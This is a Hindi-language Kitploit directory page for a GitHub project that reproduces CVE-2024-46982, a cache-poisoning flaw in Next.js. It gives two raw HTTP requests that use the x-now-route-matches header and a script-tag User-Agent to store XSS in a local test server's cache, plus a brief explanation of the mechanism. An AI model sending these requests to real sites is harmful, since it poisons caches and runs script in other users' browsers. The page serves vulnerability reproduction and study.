Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-46982-Reproduction — Reproduction of CVE-2024-46982 | Kitploit
उपकरण/GitHubGitHub/samuel871211/cve-2024-46982-reproduction
Vulnerability AnalysisExploitationWeb Application ExploitationWeb Security
GitHubsamuel871211/cve-2024-46982-reproduction

CVE-2024-46982-Reproduction

Reproduction of CVE-2024-46982

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
7 महीने पहलेअभी तक समीक्षित नहीं

शुरू करना

  1. Node.js LTS स्थापित करें
  2. npm install
  3. npm run build
  4. npm run start

शोषण 1: कैश पॉइज़निंग के माध्यम से संग्रहीत XSS

  1. किसी भी HTTP क्लाइंट का उपयोग करके निम्नलिखित HTTP अनुरोध (हमला अनुरोध) भेजें।
root@kitploit:~
GET /poc?__nextDataReq=1 HTTP/1.1
Host: localhost:3000
User-Agent: <script>alert('XSS')</script>
x-now-route-matches: 1


CVE-2024-46982-attack 2. किसी भी वेब ब्राउज़र का उपयोग करके http://localhost:3000 (सामान्य अनुरोध) पर जाएँ। CVE-2024-46982-normal

शोषण 2: कैश पॉइज़निंग के माध्यम से संग्रहीत XSS

  1. किसी भी HTTP क्लाइंट का उपयोग करके निम्नलिखित HTTP अनुरोध (हमला अनुरोध) भेजें, सुनिश्चित करें कि आप "UiKoKFFGnF1td3mMyeDX5" को अपने ".next/BUILD_ID" से बदल दें। CVE-2024-46982-build-id
root@kitploit:~
GET /_next/data/UiKoKFFGnF1td3mMyeDX5/poc.json HTTP/1.1
Host: localhost:3000
User-Agent: <script>alert('XSS')</script>
x-now-route-matches: 1


CVE-2024-46982-attack-2 2. किसी भी वेब ब्राउज़र का उपयोग करके http://localhost:3000 (सामान्य अनुरोध) पर जाएँ। CVE-2024-46982-normal

यह कैसे काम करता है ?

  1. x-now-route-matches Next.js द्वारा मान्यता प्राप्त एक कस्टम HTTP हैडर है। जब यह मौजूद होता है, तो Next.js HTTP अनुरोध को "SSG" (Static Site Generation) के रूप में मानेगा, जिससे HTTP प्रतिक्रिया कैश की जा सकती है (Cache-Control: s-maxage=1, stale-while-revalidate)।

  2. ?__nextDataReq=1 Next.js द्वारा मान्यता प्राप्त एक क्वेरीस्ट्रिंग है। जब यह मौजूद होता है, तो Next.js HTTP अनुरोध को "Retrieving __NEXT_DATA__" के रूप में मानेगा।

पूरा विवरण श्रेय अनुभाग में पाया जा सकता है।

श्रेय

  • https://zhero-web-sec.github.io/research-and-things/nextjs-cache-and-chains-the-stale-elixir
टूल डाउनलोड करें